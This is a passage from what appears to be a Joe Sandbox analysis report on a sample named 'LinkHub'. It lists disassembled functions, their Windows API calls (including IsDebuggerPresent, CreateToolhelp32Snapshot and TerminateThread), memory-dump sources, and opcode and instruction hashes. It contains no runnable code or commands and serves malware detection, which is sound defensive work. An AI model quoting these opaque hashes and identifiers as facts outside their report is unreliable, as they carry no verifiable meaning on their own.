                                                                      • Part of subcall function 00C75851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C755D1,?,?,00CB4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C75871
                                                                      • Part of subcall function 00C73A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C73A76
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                    • String ID: X
                                                                    • API String ID: 779396738-3081909835
                                                                    • Opcode ID: 4838582e8c69f54b390c0bb4c3de6983ce06b253fd6c27495cd2be4c61715903
                                                                    • Instruction ID: 5a18723694af494991db2d8192bb4e509611a37a66b38cbfe5698ec4cde53b5e
                                                                    • Opcode Fuzzy Hash: 4838582e8c69f54b390c0bb4c3de6983ce06b253fd6c27495cd2be4c61715903
                                                                    • Instruction Fuzzy Hash: 3A21F370A002589BCB11DF94C806BEE7BFCAF48310F008019E448A7381DBF49A89AFA1
                                                                    Function 00C8FFE0 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE ref: 00C9007D
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00C9008F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 3280610774-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: a1104c4cae1007d566615145b23c4ed76b73451ee9aea87c830c0af22c76cb23
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: 4731D270A00105DFCB18CF59D488A69FBB6FB49300B34A6A5E41ACB252D732EEC1CBC0
                                                                    Function 00C7396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C73A3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_
                                                                    • String ID:
                                                                    • API String ID: 1144537725-0
                                                                    • Opcode ID: d7b3657d9676a3a09e74877aadb5bc59a15dcbe37d531b725296bd7c3a47078b
                                                                    • Instruction ID: 16ff0398e78638782de16977cb1311f47f9b2b7687087dcdc5ee40fa2c0e5f8f
                                                                    • Opcode Fuzzy Hash: d7b3657d9676a3a09e74877aadb5bc59a15dcbe37d531b725296bd7c3a47078b
                                                                    • Instruction Fuzzy Hash: 0F316D705047019FD320DF64D8897A7BBF8BB49718F00092EF6D987341E775AA48DB52
                                                                    Function 00CA4EB8 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00CA4F04
                                                                    • GetFileType.KERNELBASE(00000000), ref: 00CA4F16
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleType
                                                                    • String ID:
                                                                    • API String ID: 3000768030-0
                                                                    • Opcode ID: 43899902529d45d9aa7481b1889c114502ff4d9746b65b8e4dddc1b9635ae8bc
                                                                    • Instruction ID: 3a4c91d8005e3adf6ef530c9251627c87a074abe9b696ba3fb7f88917d2ccd0b
                                                                    • Opcode Fuzzy Hash: 43899902529d45d9aa7481b1889c114502ff4d9746b65b8e4dddc1b9635ae8bc
                                                                    • Instruction Fuzzy Hash: 90110A351047434EC7388EBE9C88622BA95A7D7338B38171AD5B6C31F1D7B0DE829250
                                                                    Function 00CE0AC4 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00CB3A00,00000000), ref: 00CE0AEC
                                                                    • InterlockedExchange.KERNEL32(00000038,00000000), ref: 00CE0B0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                    • String ID:
                                                                    • API String ID: 4104817828-0
                                                                    • Opcode ID: 36f528e2bac1e07fb03026cebd9d10c5264ba60f3f72b9ae4c6345c437def45d
                                                                    • Instruction ID: d9a9cf170e0caf1a8445fd904e2f804a6edca931c1b86e4bbfd23aa4c02fb7c8
                                                                    • Opcode Fuzzy Hash: 36f528e2bac1e07fb03026cebd9d10c5264ba60f3f72b9ae4c6345c437def45d
                                                                    • Instruction Fuzzy Hash: 91F012B15007059BC320DF5AD9449A7FBECFF94720B40882EE48A87A20CBB4B085CBA0
                                                                    Function 00C7331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 00C7333D
                                                                      • Part of subcall function 00C732E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C732FB
                                                                      • Part of subcall function 00C732E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C73312
                                                                      • Part of subcall function 00C7338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C73368,?), ref: 00C733BB
                                                                      • Part of subcall function 00C7338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C73368,?), ref: 00C733CE
                                                                      • Part of subcall function 00C7338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D42418,00D42400,?,?,?,?,?,?,00C73368,?), ref: 00C7343A
                                                                      • Part of subcall function 00C7338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00D42418,?,?,?,?,?,?,?,00C73368,?), ref: 00C734BB
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00C73377
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                    • String ID:
                                                                    • API String ID: 1550534281-0
                                                                    • Opcode ID: 20be68536ee119bc04d58724f999a3e310b147217d74487618bd20ecbc72b7e6
                                                                    • Instruction ID: 5accb3af8fdb98648cef70a9d912dceb8d39b305351a5b788366a08d4140beaa
                                                                    • Opcode Fuzzy Hash: 20be68536ee119bc04d58724f999a3e310b147217d74487618bd20ecbc72b7e6
                                                                    • Instruction Fuzzy Hash: 2DF054755547849FD7116F60EC0EB7437A4A702709F54481AF90DC52F2CBB99191AB70
                                                                    Function 00CE0B4C Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CE1312: InterlockedExchange.KERNEL32(?,?), ref: 00CE1322
                                                                      • Part of subcall function 00CE1312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00CE1334
                                                                      • Part of subcall function 00CE1312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00CE1342
                                                                      • Part of subcall function 00CE1312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00CE1350
                                                                      • Part of subcall function 00CE1312: CloseHandle.KERNEL32(00000000), ref: 00CE135F
                                                                      • Part of subcall function 00CE1312: InterlockedExchange.KERNEL32(?,000001F6), ref: 00CE136F
                                                                      • Part of subcall function 00CE1312: LeaveCriticalSection.KERNEL32(00000000), ref: 00CE1376
                                                                    • CloseHandle.KERNELBASE(?,?,00CE0BBF), ref: 00CE0B5D
                                                                    • DeleteCriticalSection.KERNEL32(?,?,00CE0BBF), ref: 00CE0B83
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2929296749-0
                                                                    • Opcode ID: 517762a14c95ec198a41b2652d30f846358ee853eeb8ceea588fbde06eb909ad
                                                                    • Instruction ID: f314a8ede96eba03c251c6e1479f11ba6403048de4c1f9047391ab527c9ee4e9
                                                                    • Opcode Fuzzy Hash: 517762a14c95ec198a41b2652d30f846358ee853eeb8ceea588fbde06eb909ad
                                                                    • Instruction Fuzzy Hash: E6E01A720007119FCB306F65E809A86BBE5BF14325F34885EE49A95A31CB70A8849B54
                                                                    Function 00C7CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 00C7CEEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer
                                                                    • String ID:
                                                                    • API String ID: 1385522511-0
                                                                    • Opcode ID: c58fc329c0944423540d52a8c7d8d5300ab67a8b50eb8be2935070f513a6c042
                                                                    • Instruction ID: 8b67fa95e9a6cfd81dad512dc154cb7656dbb4970b29107bbd3bc3763c8ecdd6
                                                                    • Opcode Fuzzy Hash: c58fc329c0944423540d52a8c7d8d5300ab67a8b50eb8be2935070f513a6c042
                                                                    • Instruction Fuzzy Hash: CE328E75A002069FDB20DF59C884FBAB7B5EF45354F18805DED2AAB252C734EE41DB50
                                                                    Function 00CF7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString
                                                                    • String ID:
                                                                    • API String ID: 2948472770-0
                                                                    • Opcode ID: f48b290f3f8e02e05a188ddf2fa335cacb10fd61d08c04947a299cf9a8f94561
                                                                    • Instruction ID: 01a40744a5247cf506cac5297c5feb97aea7fb23c554dc53566f3657102064ef
                                                                    • Opcode Fuzzy Hash: f48b290f3f8e02e05a188ddf2fa335cacb10fd61d08c04947a299cf9a8f94561
                                                                    • Instruction Fuzzy Hash: 51D15C74A04209DFCB14EF99C8819FDBBB5FF58310F14815AEA15AB391DB30AE91CB91
                                                                    Function 00C9F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e3e0d276e1f9ab6324957b6360d365c752c1a2db61250121534d6f4f53298cdd
                                                                    • Instruction ID: 5c8be5efd4483df3f00584dbc3b73cbae8ec97febc421d857e762f4c36286142
                                                                    • Opcode Fuzzy Hash: e3e0d276e1f9ab6324957b6360d365c752c1a2db61250121534d6f4f53298cdd
                                                                    • Instruction Fuzzy Hash: 6051E435A00608AFDF10DF68C848BA97BA1EF85364F19816CE818DB391D731EE43CB90
                                                                    Function 00C76679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C7668B,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C7664A
                                                                      • Part of subcall function 00C7663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C7665C
                                                                      • Part of subcall function 00C7663E: FreeLibrary.KERNEL32(00000000,?,?,00C7668B,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C7666E
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C766AB
                                                                      • Part of subcall function 00C76607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00CB5657,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C76610
                                                                      • Part of subcall function 00C76607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C76622
                                                                      • Part of subcall function 00C76607: FreeLibrary.KERNEL32(00000000,?,?,00CB5657,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C76635
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressFreeProc
                                                                    • String ID:
                                                                    • API String ID: 2632591731-0
                                                                    • Opcode ID: 9d2380a0b86c768eff2c66bbe9e32dd359b1e8ddd9a8ca22d3fd4f8961ff5a8b
                                                                    • Instruction ID: 5f155648e90e3606c78caa30aaee4cb268006c6ba0c1f815a45624ea09b19bb1
                                                                    • Opcode Fuzzy Hash: 9d2380a0b86c768eff2c66bbe9e32dd359b1e8ddd9a8ca22d3fd4f8961ff5a8b
                                                                    • Instruction Fuzzy Hash: 0611E771600605ABCF14AB60C802BAD7BA5AF50711F50C42DF49AA71C2DE71DA05EB60
                                                                    Function 00CA8782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: __wsopen_s
                                                                    • String ID:
                                                                    • API String ID: 3347428461-0
                                                                    • Opcode ID: fca2309ca1a2c8564de272a24658873f6a4e2c4b51134687dfbc32d4c3b70e07
                                                                    • Instruction ID: 374facc025efa5983612ace68876be6c6a3b4e5c66d24295dcd45977cab49b08
                                                                    • Opcode Fuzzy Hash: fca2309ca1a2c8564de272a24658873f6a4e2c4b51134687dfbc32d4c3b70e07
                                                                    • Instruction Fuzzy Hash: 5611487590420AAFCF05DF58E94099A7BF8EF49304F104069F808EB311DA31EA158B64
                                                                    Function 00CA5373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CA4FF0: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CA319C,00000001,00000364,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA5031
                                                                    • _free.LIBCMT ref: 00CA53DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                    • Instruction ID: 7118cff2d210788022cdc85e88aba5ee5822841847d4b34f804d4b2870e037ff
                                                                    • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                    • Instruction Fuzzy Hash: A60149B720030A6BE7318F69D88195AFBEDEFC6374F25091DE59483280EB70A905C774
                                                                    Function 00C9E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                    • Instruction ID: 425c3bf77034ce867c3e967497370fd21f28247d66aa0d70df31708d0c2e8f89
                                                                    • Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                    • Instruction Fuzzy Hash: 69F0283250162057DE317A7B9C0DB9A33988F53338F110B26F826A71D1EB74E90296E2
                                                                    Function 00C7B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID:
                                                                    • API String ID: 176396367-0
                                                                    • Opcode ID: 24e1bed089a0a212f438498dc0cf42ee6fb7a4dd5cd8dbf57bfe1d03ae170818
                                                                    • Instruction ID: 2e86e4b5f35db67863a7c77237b4000e51bea250c0aa94969f2d47c7997520b5
                                                                    • Opcode Fuzzy Hash: 24e1bed089a0a212f438498dc0cf42ee6fb7a4dd5cd8dbf57bfe1d03ae170818
                                                                    • Instruction Fuzzy Hash: 5AF0CD735017057ED7149F29D806F66BB54EB44760F10812AFA1DCB1D1DB31E55097A0
                                                                    Function 00CEF94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00CEF987
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentVariable
                                                                    • String ID:
                                                                    • API String ID: 1431749950-0
                                                                    • Opcode ID: 8d5d9fe1d16294c60fc1d958623cfad41053dcce24579acdcd71147f74e6b25a
                                                                    • Instruction ID: e4893b5f37890449199e900023ffdcb773edec540aa23306ef14252975e9f717
                                                                    • Opcode Fuzzy Hash: 8d5d9fe1d16294c60fc1d958623cfad41053dcce24579acdcd71147f74e6b25a
                                                                    • Instruction Fuzzy Hash: FCF08C72A00204BFCB04EBA5CC4AE9F77B9EF49720F004055F9099B261DB70AA41D760
